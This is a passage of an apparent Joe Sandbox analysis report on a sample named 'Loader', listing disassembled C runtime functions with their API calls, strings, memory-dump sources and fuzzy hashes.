Instruction Fuzzy Hash: 4251A179A0060AABDB10EFA4CC41ABE7BB8BF56700F144439F514E7190EB709A44CBE1

Function 001AC370 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 001A5145: GetLastError.KERNEL32(?,00000000,0019FAAF,?,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A5149
Part of subcall function 001A5145: SetLastError.KERNEL32(00000000,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A51EB

GetACP.KERNEL32(?,?,?,?,?,?,001A16A3,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001AC431
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,001A16A3,?,?,?,00000055,?,-00000050,?,?), ref: 001AC45C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 001AC5BF

Strings

utf8, xrefs: 001AC52E

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: bbebe72fbfb04b07f0333ab3ba8041359e1a77d8098785c2896eea13290b1dd9
Instruction ID: 774c7b534eff5476c6dd441eed0c661d88ad61613c4e8fd60923798f9d578477
Opcode Fuzzy Hash: bbebe72fbfb04b07f0333ab3ba8041359e1a77d8098785c2896eea13290b1dd9
Instruction Fuzzy Hash: 2B712779B00306AADB28AB39CC46FBA73A8EF6A750F144429F515D7181FB74ED4087E4

Function 001A3F53 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 001A3FE0

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 17a8af3533a897e6e906cec53c923a3a22616cf0740b16545c45100316cc9468
Instruction ID: fc989dbeaa2db11030625bcaae41e600c31fac45933931283d4d715c98ff70b9
Opcode Fuzzy Hash: 17a8af3533a897e6e906cec53c923a3a22616cf0740b16545c45100316cc9468
Instruction Fuzzy Hash: 58B17A3AD002459FDF15CF68C8917FEBBA5EFA6340F15816AF904AB241D3B49D41CBA0

Function 00197508 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00197514
IsDebuggerPresent.KERNEL32 ref: 001975E0
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001975F9
UnhandledExceptionFilter.KERNEL32(?), ref: 00197603

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: b39f09892c5069a8793f1adb4f26c6018a0cec7686a14d937c508cabda776516
Instruction ID: 4001f41ba79e16392188d69e1115cfaa8756efc0bcb31323cfa97f730da242d5
Opcode Fuzzy Hash: b39f09892c5069a8793f1adb4f26c6018a0cec7686a14d937c508cabda776516
Instruction Fuzzy Hash: FF31F775D152199BDF20EFA4D9897CDBBB8BF18300F1041AAE40DAB290EB719B848F45

Function 00191CD2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 00193272: __EH_prolog3_catch.LIBCMT ref: 00193279

_Deallocate.LIBCONCRT ref: 00191EAD
_Deallocate.LIBCONCRT ref: 00191EFA

Strings

Current val: %d, xrefs: 00191E86

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: Deallocate$H_prolog3_catch
String ID: Current val: %d
API String ID: 1212816977-1825967858
Opcode ID: a424b2a6da356b597d4bd61dfcba192187442aaaec6ea158ec1f9ce625af762b
Instruction ID: 3b5c54654b036e63f4fcd303ac846253f5ecae6d34260f7ff8eb6a838d6f613a
Opcode Fuzzy Hash: a424b2a6da356b597d4bd61dfcba192187442aaaec6ea158ec1f9ce625af762b
Instruction Fuzzy Hash: 4A61CC7251C3429FC721DF69D48026BFBE0AFD9724F140A2DF9D493242D735E9448B92

Function 00193819 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00193820
std::_Lockit::_Lockit.LIBCPMT ref: 0019382A
int.LIBCPMT ref: 00193841

Part of subcall function 001916DA: std::_Lockit::_Lockit.LIBCPMT ref: 001916EB
Part of subcall function 001916DA: std::_Lockit::~_Lockit.LIBCPMT ref: 00191705

codecvt.LIBCPMT ref: 00193864
std::_Facet_Register.LIBCPMT ref: 0019387B
std::_Lockit::~_Lockit.LIBCPMT ref: 0019389B
Concurrency::cancel_current_task.LIBCPMT ref: 001938A8

Strings

8K!, xrefs: 00193835

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID: 8K!
API String ID: 2133458128-2329799594
Opcode ID: d596c8b56cc9fd85446bb08de09315fb678e42f0a98c2bfe023bc6972e4a3e0f
Instruction ID: 1b182c57e126e512141ae7982472b96ecc5f41ef07da2caf866498b1f348f4cb
Opcode Fuzzy Hash: d596c8b56cc9fd85446bb08de09315fb678e42f0a98c2bfe023bc6972e4a3e0f
Instruction Fuzzy Hash: 5501D235D04116ABCF05EBA4C8456ADB7B1AFA4320F550508F825AB381DF74DF458B91

Function 001A75BF Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

, xrefs: 001A7838

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 30ae17a9c98b78930a4103a37ba2af49b74f639fa865806eaeb75c96fe9991ed
Instruction ID: 60ec781d8513a021da3ce0247946aa7e5f4607e2bd4e71473f1a1595e10b6006
Opcode Fuzzy Hash: 30ae17a9c98b78930a4103a37ba2af49b74f639fa865806eaeb75c96fe9991ed
Instruction Fuzzy Hash: F0B12578A08245DFDF05DFA9DC84BAEBBB5AF96310F148159E404AB2D2CB349F41CB61

Function 00194F43 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00194F4A
std::_Lockit::_Lockit.LIBCPMT ref: 00194F54
int.LIBCPMT ref: 00194F6B

Part of subcall function 001916DA: std::_Lockit::_Lockit.LIBCPMT ref: 001916EB
Part of subcall function 001916DA: std::_Lockit::~_Lockit.LIBCPMT ref: 00191705

std::_Facet_Register.LIBCPMT ref: 00194FA5
std::_Lockit::~_Lockit.LIBCPMT ref: 00194FC5
Concurrency::cancel_current_task.LIBCPMT ref: 00194FD2

Strings

TK!, xrefs: 00194F5F

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID: TK!
API String ID: 55977855-3406879214
Opcode ID: b1bc25d12063d9bb8556d879209d8f1f5e00d0e0c9235c758c8e41be24456ea2
Instruction ID: 071e3ce6b808f8853311382808dd58a7975ea228392fddc9d96cc7b245dd6070
Opcode Fuzzy Hash: b1bc25d12063d9bb8556d879209d8f1f5e00d0e0c9235c758c8e41be24456ea2
Instruction Fuzzy Hash: 19110371900219ABCF05EB68C846BAEB7F9AF64320F120509F425A7381DFB4EE418B91

Function 0019A1A8 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 303COMMON

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0019A2C7
___TypeMatch.LIBVCRUNTIME ref: 0019A3D5
CallUnexpected.LIBVCRUNTIME ref: 0019A542

Strings

csm, xrefs: 0019A1E5
csm, xrefs: 0019A2FE
csm, xrefs: 0019A252

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: CallMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 1206542248-393685449
Opcode ID: 431a1a89ae57b6e7917a7b4f78c6a113fcb8d02859028e1342aa7ffe107b6cb6
Instruction ID: 975ac11d143191924c6a25af9dc02371b117e8a37d8a22cb8c6deb27397bd708
Opcode Fuzzy Hash: 431a1a89ae57b6e7917a7b4f78c6a113fcb8d02859028e1342aa7ffe107b6cb6
Instruction Fuzzy Hash: 1CB1AD71800209EFCF25DFA8C8859AEBBB5FF24310F95419AE8006B212D771EE55CBD2

Function 001A352F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,001A363C,?,?,00000000,00000000,?,?,001A37EA,00000021,FlsSetValue,001B69C8,001B69D0,00000000), ref: 001A35F0

Strings

ext-ms-, xrefs: 001A359A
api-ms-, xrefs: 001A3586

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 954e9b5ebd0d443c6bfc165a5448fc314c5ae990cd43338a8f01d82632c60967
Instruction ID: b17c03ff05ad46bd6f06b01abe7b54ad611bf4e1da037ff65d3798138731556d
Opcode Fuzzy Hash: 954e9b5ebd0d443c6bfc165a5448fc314c5ae990cd43338a8f01d82632c60967
Instruction Fuzzy Hash: 7A210A39E01210FBCB219B29EC49B9A7759AF53774F250215F935A7291EB30EF05CAD0

Function 0019307F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0019308B
int.LIBCPMT ref: 0019309E

Part of subcall function 001916DA: std::_Lockit::_Lockit.LIBCPMT ref: 001916EB
Part of subcall function 001916DA: std::_Lockit::~_Lockit.LIBCPMT ref: 00191705

std::_Facet_Register.LIBCPMT ref: 001930D1
std::_Lockit::~_Lockit.LIBCPMT ref: 001930E7
Concurrency::cancel_current_task.LIBCPMT ref: 001930F2

Strings

\K!, xrefs: 00193096

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID: \K!
API String ID: 2081738530-3305343062
Opcode ID: e454139d7e4a0e22431b12f76975df1ee3b082ef04f9dc2d1eced559fe0c4338
Instruction ID: a79c4938e1036861c70cb90700e6d611ca33d9745e3e702e6485fd15535a10b3
Opcode Fuzzy Hash: e454139d7e4a0e22431b12f76975df1ee3b082ef04f9dc2d1eced559fe0c4338
Instruction Fuzzy Hash: C301A736904115BBCF19AB54D8058DDB778DF90360B154145F5255B291EF30EF81C7D0

Function 001924EF Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001924FB
int.LIBCPMT ref: 0019250E

Part of subcall function 001916DA: std::_Lockit::_Lockit.LIBCPMT ref: 001916EB
Part of subcall function 001916DA: std::_Lockit::~_Lockit.LIBCPMT ref: 00191705

std::_Facet_Register.LIBCPMT ref: 00192541
std::_Lockit::~_Lockit.LIBCPMT ref: 00192557
Concurrency::cancel_current_task.LIBCPMT ref: 00192562

Strings

`K!, xrefs: 00192506

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID: `K!
API String ID: 2081738530-3899823266
Opcode ID: 90a050b76b162d965ea760257da1ec0ec0487566133ab35f9e748f927da8e352
Instruction ID: 6f021000145e2226cd7a13c92aeaf2d8bfef575c5161f193c7032ba4f3f38da2
Opcode Fuzzy Hash: 90a050b76b162d965ea760257da1ec0ec0487566133ab35f9e748f927da8e352
Instruction Fuzzy Hash: CF01DF32904115FBDF19AB54E8158ED7768DFA0720B120148F4159B281EF30EE46CBC0

Function 0019667B Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 001966C4
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0019672F
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0019674C
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0019678B
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001967EA
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0019680D

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 3c42810f0402d8cdfbfa6612ac12c8da37f89ab8d3bdaabd14faf034bfb2b275
Instruction ID: fd4b63b902547f498e14e84cbed655e9666f95d68cb95f89ca96952b8a40a8a6
Opcode Fuzzy Hash: 3c42810f0402d8cdfbfa6612ac12c8da37f89ab8d3bdaabd14faf034bfb2b275
Instruction Fuzzy Hash: 6951AE72A0021AEFEF249FA1CC45FAB7BA9EF44794F254529F914A6150DB30DD50CBB0

Function 00199E3A Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00199E31,0019802B,001976E5), ref: 00199E48
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00199E56
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00199E6F
SetLastError.KERNEL32(00000000,00199E31,0019802B,001976E5), ref: 00199EC1

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 35717d709cf17fc26ad939ebd297f6fe03aed37d9f9f23a27a922b4b02a763e6
Instruction ID: 2193068ae8c52f756d8395eed581381516a460575a4c5f5a83a64c50def2988e
Opcode Fuzzy Hash: 35717d709cf17fc26ad939ebd297f6fe03aed37d9f9f23a27a922b4b02a763e6
Instruction Fuzzy Hash: 9C01F73260D611EEAF257BB9BDC676B3A99FB11775720033DF121811F0EFA24C419141

Function 001A0DAB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,001B1F55,000000FF,?,001A0D3B,001A0E6B,?,001A0D0F,00000000), ref: 001A0DE0
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,001B1F55,000000FF,?,001A0D3B,001A0E6B,?,001A0D0F,00000000), ref: 001A0DF2
FreeLibrary.KERNEL32(00000000,?,?,00000000,001B1F55,000000FF,?,001A0D3B,001A0E6B,?,001A0D0F,00000000), ref: 001A0E14

Strings

CorExitProcess, xrefs: 001A0DEA
mscoree.dll, xrefs: 001A0DD9

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: e89c1bdbeb840ffa8339428395cfdedb46b2bd143029c754627bef18ddbcca0e
Instruction ID: cee186e811f4aa49f3f914f4c84c7db2db0b1aa9b47607f9b2efcedff820af2a
Opcode Fuzzy Hash: e89c1bdbeb840ffa8339428395cfdedb46b2bd143029c754627bef18ddbcca0e
Instruction Fuzzy Hash: C701DB35540615FFDB129F44CC05BEEB7B8FF04710F000629F821E26D0DB749940CA90

Function 00194CC6 Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00194CCD
std::_Lockit::_Lockit.LIBCPMT ref: 00194CD8
std::_Lockit::~_Lockit.LIBCPMT ref: 00194D46

Part of subcall function 00194E29: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00194E41

std::locale::_Setgloballocale.LIBCPMT ref: 00194CF3
_Yarn.LIBCPMT ref: 00194D09

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: ae035912c6d8a5177192b70a617e71caac863f87bc68d2044ce5b6e0a872136c
Instruction ID: 86bc1d4191b287f2aab416022db7e2ae8be18dafdda312e61c29a7afb9323141
Opcode Fuzzy Hash: ae035912c6d8a5177192b70a617e71caac863f87bc68d2044ce5b6e0a872136c
Instruction Fuzzy Hash: 5D018475A001109BCB06EB60D8559BD7BB5FFA4750B154008E82157391CF34AF42CFC1

Function 0019AF82 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0019AF33,00000000,?,002150DC,?,?,?,0019B0D6,00000004,InitializeCriticalSectionEx,001B4C70,InitializeCriticalSectionEx), ref: 0019AF8F
GetLastError.KERNEL32(?,0019AF33,00000000,?,002150DC,?,?,?,0019B0D6,00000004,InitializeCriticalSectionEx,001B4C70,InitializeCriticalSectionEx,00000000,?,0019AE8D), ref: 0019AF99
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0019AFC1

Strings

api-ms-, xrefs: 0019AFA6

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 4e6a6b6cc29792df9b42e5011b3cf9ea616deef17f5a47442787e256dda6a2a3
Instruction ID: a773ee99e4314565ffbcdd94c29eb0dd7a0edf54f67d3193cd12de07fedd8f06
Opcode Fuzzy Hash: 4e6a6b6cc29792df9b42e5011b3cf9ea616deef17f5a47442787e256dda6a2a3
Instruction Fuzzy Hash: D7E08670684204BBEF112F72EC0AB5C3F64AF11B44F504121F90CE84E1D771DAB489C5

Function 001A575E Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,016E13CA), ref: 001A57C1

Part of subcall function 001A9815: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001A88DA,?,00000000,-00000008), ref: 001A98C1

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001A5A1C
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001A5A64
GetLastError.KERNEL32 ref: 001A5B07

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 40a0872cc8a7ac2f992eae17a792d0d2eea550d39e55a1aa73910b2466ce67e8
Instruction ID: a7195510aadb6e310c4899b6f250431b5dcb297bc215c708923e0b048c8e866c
Opcode Fuzzy Hash: 40a0872cc8a7ac2f992eae17a792d0d2eea550d39e55a1aa73910b2466ce67e8
Instruction Fuzzy Hash: 35D16979E046589FCB05CFA8D880AEDBBB6FF4A314F18456AE816EB351D730A941CB50

Function 00199F51 Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0019A018
___AdjustPointer.LIBCMT ref: 0019A03B
___AdjustPointer.LIBCMT ref: 0019A0D7

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

